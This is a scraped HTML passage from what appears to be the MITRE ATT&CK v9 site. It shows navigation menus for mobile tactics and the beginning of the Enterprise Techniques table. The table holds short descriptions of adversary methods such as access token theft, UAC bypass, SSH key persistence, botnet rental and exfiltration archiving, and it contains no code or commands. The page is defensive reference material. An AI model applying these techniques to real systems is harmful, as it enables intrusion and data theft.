collapsed" id="mobile-TA0035-header" data-toggle="collapse" data-target="#mobile-TA0035-body" aria-expanded="false" aria-controls="#mobile-TA0035-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0035-body" aria-labelledby="mobile-TA0035-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1435"> <a href="/versions/v9/techniques/T1435/"> Access Calendar Entries </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1433"> <a href="/versions/v9/techniques/T1433/"> Access Call Log </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1432"> <a href="/versions/v9/techniques/T1432/"> Access Contact List </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1517"> <a href="/versions/v9/techniques/T1517/"> Access Notifications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1413"> <a href="/versions/v9/techniques/T1413/"> Access Sensitive Data in Device Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1409"> <a href="/versions/v9/techniques/T1409/"> Access Stored Application Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1429"> <a href="/versions/v9/techniques/T1429/"> Capture Audio </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1512"> <a href="/versions/v9/techniques/T1512/"> Capture Camera </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1414"> <a href="/versions/v9/techniques/T1414/"> Capture Clipboard Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1412"> <a href="/versions/v9/techniques/T1412/"> Capture SMS Messages </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1533"> <a href="/versions/v9/techniques/T1533/"> Data from Local System </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1541"> <a href="/versions/v9/techniques/T1541/"> Foreground Persistence </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1417"> <a href="/versions/v9/techniques/T1417/"> Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1430"> <a href="/versions/v9/techniques/T1430/"> Location Tracking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1507"> <a href="/versions/v9/techniques/T1507/"> Network Information Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1410"> <a href="/versions/v9/techniques/T1410/"> Network Traffic Capture or Redirection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0035-T1513"> <a href="/versions/v9/techniques/T1513/"> Screen Capture </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0037"> <a href="/versions/v9/tactics/TA0037"> Command and Control </a> <div class="expand-button collapsed" id="mobile-TA0037-header" data-toggle="collapse" data-target="#mobile-TA0037-body" aria-expanded="false" aria-controls="#mobile-TA0037-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0037-body" aria-labelledby="mobile-TA0037-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1438"> <a href="/versions/v9/techniques/T1438/"> Alternate Network Mediums </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1436"> <a href="/versions/v9/techniques/T1436/"> Commonly Used Port </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1520"> <a href="/versions/v9/techniques/T1520/"> Domain Generation Algorithms </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1544"> <a href="/versions/v9/techniques/T1544/"> Remote File Copy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1437"> <a href="/versions/v9/techniques/T1437/"> Standard Application Layer Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1521"> <a href="/versions/v9/techniques/T1521/"> Standard Cryptographic Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1509"> <a href="/versions/v9/techniques/T1509/"> Uncommonly Used Port </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0037-T1481"> <a href="/versions/v9/techniques/T1481/"> Web Service </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0036"> <a href="/versions/v9/tactics/TA0036"> Exfiltration </a> <div class="expand-button collapsed" id="mobile-TA0036-header" data-toggle="collapse" data-target="#mobile-TA0036-body" aria-expanded="false" aria-controls="#mobile-TA0036-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0036-body" aria-labelledby="mobile-TA0036-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0036-T1438"> <a href="/versions/v9/techniques/T1438/"> Alternate Network Mediums </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0036-T1436"> <a href="/versions/v9/techniques/T1436/"> Commonly Used Port </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0036-T1532"> <a href="/versions/v9/techniques/T1532/"> Data Encrypted </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0036-T1437"> <a href="/versions/v9/techniques/T1437/"> Standard Application Layer Protocol </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0034"> <a href="/versions/v9/tactics/TA0034"> Impact </a> <div class="expand-button collapsed" id="mobile-TA0034-header" data-toggle="collapse" data-target="#mobile-TA0034-body" aria-expanded="false" aria-controls="#mobile-TA0034-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0034-body" aria-labelledby="mobile-TA0034-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1448"> <a href="/versions/v9/techniques/T1448/"> Carrier Billing Fraud </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1510"> <a href="/versions/v9/techniques/T1510/"> Clipboard Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1471"> <a href="/versions/v9/techniques/T1471/"> Data Encrypted for Impact </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1447"> <a href="/versions/v9/techniques/T1447/"> Delete Device Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1446"> <a href="/versions/v9/techniques/T1446/"> Device Lockout </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1472"> <a href="/versions/v9/techniques/T1472/"> Generate Fraudulent Advertising Revenue </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1516"> <a href="/versions/v9/techniques/T1516/"> Input Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1452"> <a href="/versions/v9/techniques/T1452/"> Manipulate App Store Rankings or Ratings </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1400"> <a href="/versions/v9/techniques/T1400/"> Modify System Partition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0034-T1582"> <a href="/versions/v9/techniques/T1582/"> SMS Control </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0038"> <a href="/versions/v9/tactics/TA0038"> Network Effects </a> <div class="expand-button collapsed" id="mobile-TA0038-header" data-toggle="collapse" data-target="#mobile-TA0038-body" aria-expanded="false" aria-controls="#mobile-TA0038-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0038-body" aria-labelledby="mobile-TA0038-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1466"> <a href="/versions/v9/techniques/T1466/"> Downgrade to Insecure Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1439"> <a href="/versions/v9/techniques/T1439/"> Eavesdrop on Insecure Network Communication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1449"> <a href="/versions/v9/techniques/T1449/"> Exploit SS7 to Redirect Phone Calls/SMS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1450"> <a href="/versions/v9/techniques/T1450/"> Exploit SS7 to Track Device Location </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1464"> <a href="/versions/v9/techniques/T1464/"> Jamming or Denial of Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1463"> <a href="/versions/v9/techniques/T1463/"> Manipulate Device Communication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1467"> <a href="/versions/v9/techniques/T1467/"> Rogue Cellular Base Station </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1465"> <a href="/versions/v9/techniques/T1465/"> Rogue Wi-Fi Access Points </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0038-T1451"> <a href="/versions/v9/techniques/T1451/"> SIM Card Swap </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0039"> <a href="/versions/v9/tactics/TA0039"> Remote Service Effects </a> <div class="expand-button collapsed" id="mobile-TA0039-header" data-toggle="collapse" data-target="#mobile-TA0039-body" aria-expanded="false" aria-controls="#mobile-TA0039-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0039-body" aria-labelledby="mobile-TA0039-header"> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0039-T1470"> <a href="/versions/v9/techniques/T1470/"> Obtain Device Cloud Backups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0039-T1468"> <a href="/versions/v9/techniques/T1468/"> Remotely Track Device Without Authorization </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0039-T1469"> <a href="/versions/v9/techniques/T1469/"> Remotely Wipe Data Without Authorization </a> </div> </div> </div> </div> </div> </div> </div> <!--start-indexing-for-search--> </div> <div class="tab-content col-xl-10 col-lg-9 col-md-9 pt-4" id="v-tabContent"> <div class="tab-pane fade show active" id="v-attckmatrix" role="tabpanel" aria-labelledby="v-attckmatrix-tab"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="/versions/v9/">Home</a></li> <li class="breadcrumb-item"><a href="/versions/v9/techniques/enterprise/">Techniques</a></li> <li class="breadcrumb-item">Enterprise</li> </ol> <div class="tab-pane fade show active" id="v-" role="tabpanel" aria-labelledby="v--tab"></div> <div class="row"> <div class="col-xl-12"> <div class="jumbotron jumbotron-fluid"> <div class="container-fluid"> <div class="overflow-x-auto"> <div class="row"> <div class="col-md-8"> <h1> Enterprise Techniques </h1> </div> <div class="col-md-4"> <div class="row table-object-count pr-3"> <h6>Techniques: 185</h6> </div> <div class="row table-object-count pr-3"> <h6>Sub-techniques: 367</h6> </div> </div> </div> <table class="table-techniques"> <thead> <tr> <td colspan="2">ID</td> <td>Name</td> <td>Description</td> </tr> </thead> <tbody> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1548"> T1548 </a> </td> <td> <a href="/versions/v9/techniques/T1548"> Abuse Elevation Control Mechanism </a> </td> <td> Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1548/001"> Setuid and Setgid </a> </td> <td> An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. . Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1548/002"> Bypass User Account Control </a> </td> <td> Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1548/003"> Sudo and Sudo Caching </a> </td> <td> Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1548/004"> Elevated Execution with Prompt </a> </td> <td> Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials. The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1134"> T1134 </a> </td> <td> <a href="/versions/v9/techniques/T1134"> Access Token Manipulation </a> </td> <td> Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1134/001"> Token Impersonation/Theft </a> </td> <td> Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1134/002"> Create Process with Token </a> </td> <td> Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with <code>DuplicateToken(Ex)</code> and use it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1134/003"> Make and Impersonate Token </a> </td> <td> Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1134/004"> Parent PID Spoofing </a> </td> <td> Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1134/005"> SID-History Injection </a> </td> <td> Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1531"> T1531 </a> </td> <td> <a href="/versions/v9/techniques/T1531"> Account Access Removal </a> </td> <td> Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1087"> T1087 </a> </td> <td> <a href="/versions/v9/techniques/T1087"> Account Discovery </a> </td> <td> Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1087/001"> Local Account </a> </td> <td> Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1087/002"> Domain Account </a> </td> <td> Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1087/003"> Email Account </a> </td> <td> Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1087/004"> Cloud Account </a> </td> <td> Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1098"> T1098 </a> </td> <td> <a href="/versions/v9/techniques/T1098"> Account Manipulation </a> </td> <td> Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1098/001"> Additional Cloud Credentials </a> </td> <td> Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1098/002"> Exchange Email Delegate Permissions </a> </td> <td> Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The <code>Add-MailboxPermission</code> <a href="/versions/v9/techniques/T1059/001">PowerShell</a> cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1098/003"> Add Office 365 Global Administrator Role </a> </td> <td> An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1098/004"> SSH Authorized Keys </a> </td> <td> Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>. Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value "yes" to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1583"> T1583 </a> </td> <td> <a href="/versions/v9/techniques/T1583"> Acquire Infrastructure </a> </td> <td> Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Additionally, botnets are available for rent or purchase. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1583/001"> Domains </a> </td> <td> Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1583/002"> DNS Server </a> </td> <td> Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: <a href="/versions/v9/techniques/T1071">Application Layer Protocol</a>). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1583/003"> Virtual Private Server </a> </td> <td> Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1583/004"> Server </a> </td> <td> Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party <a href="/versions/v9/techniques/T1584/004">Server</a> or renting a <a href="/versions/v9/techniques/T1583/003">Virtual Private Server</a>, adversaries may opt to configure and run their own servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1583/005"> Botnet </a> </td> <td> Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale <a href="/versions/v9/techniques/T1566">Phishing</a> or Distributed Denial of Service (DDoS). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1583/006"> Web Services </a> </td> <td> Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (<a href="/versions/v9/techniques/T1102">Web Service</a>) or <a href="/versions/v9/techniques/T1567">Exfiltration Over Web Service</a>. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1595"> T1595 </a> </td> <td> <a href="/versions/v9/techniques/T1595"> Active Scanning </a> </td> <td> Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1595/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1595/001"> Scanning IP Blocks </a> </td> <td> Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1595/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1595/002"> Vulnerability Scanning </a> </td> <td> Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1071"> T1071 </a> </td> <td> <a href="/versions/v9/techniques/T1071"> Application Layer Protocol </a> </td> <td> Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1071/001"> Web Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1071/002"> File Transfer Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1071/003"> Mail Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1071/004"> DNS </a> </td> <td> Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1010"> T1010 </a> </td> <td> <a href="/versions/v9/techniques/T1010"> Application Window Discovery </a> </td> <td> Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1560"> T1560 </a> </td> <td> <a href="/versions/v9/techniques/T1560"> Archive Collected Data </a> </td> <td> An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1560/001"> Archive via Utility </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip, WinRAR, and WinZip. Most utilities include functionality to encrypt and/or compress data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1560/002"> Archive via Library </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including <a href="/versions/v9/techniques/T1059/006">Python</a> rarfile , libzip , and zlib . Most libraries include functionality to encrypt and/or compress data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1560/003"> Archive via Custom Method </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1123"> T1123 </a> </td> <td> <a href="/versions/v9/techniques/T1123"> Audio Capture </a> </td> <td> An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1119"> T1119 </a> </td> <td> <a href="/versions/v9/techniques/T1119"> Automated Collection </a> </td> <td> Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a <a href="/versions/v9/techniques/T1059">Command and Scripting Interpreter</a> to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1020"> T1020 </a> </td> <td> <a href="/versions/v9/techniques/T1020"> Automated Exfiltration </a> </td> <td> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1020/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1020/001"> Traffic Duplication </a> </td> <td> 